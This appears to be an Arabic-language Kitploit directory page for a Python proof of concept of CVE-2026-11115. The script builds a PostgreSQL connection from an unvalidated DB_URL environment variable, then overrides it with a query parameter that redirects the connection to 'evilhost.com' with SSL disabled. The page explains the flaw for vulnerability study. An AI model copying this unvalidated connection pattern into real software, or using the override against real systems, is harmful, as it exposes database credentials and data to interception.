Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-11115-Database-Connection-String-Injection-via-Env-Variable — إثبات مفهوم بسيط بلغة Python لثغرة CVE-2026-11115، يوضح حقن سلسلة اتصال قاعدة البيانات عبر متغيرات البيئة وإعادة التوجيه إلى مضيفات PostgreSQL التي يتحكم بها المهاجم. | Kitploit
أدوات/GitHubGitHub/george0papasotiriou/cve-2026-11115-database-connection-string-injection-via-env-variable
تحليل الثغرات الأمنيةالاستغلالاختبار الاختراقسوء التكوينالتعلم والتعليمأمن قواعد البيانات
GitHubgeorge0papasotiriou/cve-2026-11115-database-connection-string-injection-via-env-variable

CVE-2026-11115-Database-Connection-String-Injection-via-Env-Variable

إثبات مفهوم بسيط بلغة Python لثغرة CVE-2026-11115، يوضح حقن سلسلة اتصال قاعدة البيانات عبر متغيرات البيئة وإعادة التوجيه إلى مضيفات PostgreSQL التي يتحكم بها المهاجم.

عرض المستودع
6منذ شهر واحدلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2026-11115 – حقن سلسلة اتصال قاعدة البيانات عبر متغير بيئة

الكود البرمجي (بايثون)

root@kitploit:~
# db_connector.py - Constructs DB connection string from environment
import os, psycopg2

def connect():
    # Reads DB_URL; attacker can override via environment injection if they control an env var
    db_url = os.getenv('DB_URL', 'postgresql://user:pass@localhost/db')
    # Vulnerability: no validation; allows extra parameters like ?application_name=... but also SSRF or auth bypass
    conn = psycopg2.connect(db_url)
    return conn

# Simulate an attacker who can set environment variable:
os.environ['DB_URL'] = "postgresql://user:pass@localhost/db?host=evilhost.com&sslmode=disable"
c = connect()  # Connects to attacker-controlled host!
print("Connected to attacker DB.")

CVE-2026-11115 – حقن سلسلة اتصال قاعدة البيانات

Severity: High

نظرة عامة

يقوم التطبيق ببناء سلسلة اتصال قاعدة البيانات من متغير بيئة دون تحقق. إذا تمكن المهاجم من التأثير على ذلك المتغير (على سبيل المثال، عبر تزوير طلب من جهة الخادم أو إعداد غير صحيح في خط أنابيب CI/CD)، فيمكنه إعادة توجيه اتصال قاعدة البيانات إلى خادمه الخاص، مما يتيح له اعتراض البيانات أو تعديلها.

تفاصيل الثغرة

  • النوع: حقن سلسلة الاتصال
  • الأثر: تسريب البيانات، هجوم الوسيط (Man-in-the-Middle).
  • السبب الجذري: يتم أخذ URI الاتصال الكامل من متغير بيئة، ويمكن إلحاق معاملات إضافية (مثل host) لتجاوز المضيف الأصلي.

عرض الاستغلال

شغّل المحاكاة:

root@kitploit:~
pip install psycopg2-binary
python db_connector.py

يحاول البرنامج الاتصال بـ evilhost.com بدلاً من localhost.

تنزيل الأداة